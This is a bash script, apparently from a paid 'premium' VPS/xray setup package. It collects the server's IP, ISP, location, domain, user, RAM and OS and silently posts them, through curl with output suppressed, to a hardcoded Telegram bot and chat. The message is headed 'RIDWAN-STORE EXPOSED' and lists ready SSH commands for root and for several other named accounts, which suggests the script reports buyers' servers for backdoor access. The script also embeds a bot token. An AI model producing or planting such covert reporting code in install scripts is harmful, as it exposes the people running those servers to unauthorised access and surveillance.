#!/bin/bash
TIME=$(date +'%Y-%m-%d %H:%M:%S')
MYIP=$(wget -qO- ipinfo.io/ip)
ISP=$(wget -qO- ipinfo.io/org)
domain=$(cat /etc/xray/domain)
CITY=$(curl -s ipinfo.io/city)
NAMES=$(whoami)
RAMMS=$(free -m | awk 'NR==2 {print $2}')
NAMECOM=$(wget -qO- ipinfo.io/ip)
OS=$(cat /etc/os-release | grep -w PRETTY_NAME | head -n1 | sed 's/=//g' | sed 's/"//g' | sed 's/PRETTY_NAME//g')

message="
<u>RIDWAN-STORE EXPOSED</u> 
<b>ONLINE!!!</b>
<code>━━━━━━━━━━━━━━━━━━━━━</code>
<code>⚠️SCRIPT VPS PREMIUM⚠️</code>
<code>━━━━━━━━━━━━━━━━━━━━━</code>
<code>TIME    : </code><code>${TIME}</code>
<code>DOMAIN  : </code><code>${domain}</code>
<code>IP VPS  : </code><code>${MYIP}</code>
<code>ISP	  : </code><code>${ISP}</code>
<code>LOKASI  : </code><code>${CITY}</code>
<code>USER    : </code><code>${NAMES}</code>
<code>RAM     : </code><code>${RAMMS}MB</code>
<code>LINUX   : </code><code>${OS}</code>
<code>SSH-1   : </code><code>ssh root@${MYIP} -qvi taibabi</code>
<code>SSH-2   : </code><code>ssh ridwan@${MYIP} -qv</code>
<code>SSH-3   : </code><code>ssh kytproject@${MYIP} -qv</code>
<code>SSH-4   : </code><code>ssh vps@${MYIP} -qv</code>
<code>━━━━━━━━━━━━━━━━━━━━━</code>
<i>⚠️Thanks To Order Premium⚠️</i>
<code>━━━━━━━━━━━━━━━━━━━━━</code>
"

curl -s -X POST "https://api.telegram.org/bot6006599143:AAEgstCAioq35JgX97HaW_G3TAkLKzLZS_w/sendmessage" \
-d "chat_id=-1001956940889" -d "parse_mode=html" -d "text=$message" >/dev/null 2>&1